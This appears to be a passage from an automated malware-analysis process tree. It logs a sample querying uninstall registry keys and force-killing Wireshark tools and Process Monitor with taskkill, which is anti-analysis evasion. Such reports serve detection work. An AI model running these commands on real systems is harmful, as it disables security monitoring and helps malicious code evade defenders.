C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵PID:1116
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1264
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:2096
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1432
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:3776
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:1896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2144
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:2524
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:732
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1188
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2912
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1416
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:3532
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:3960
-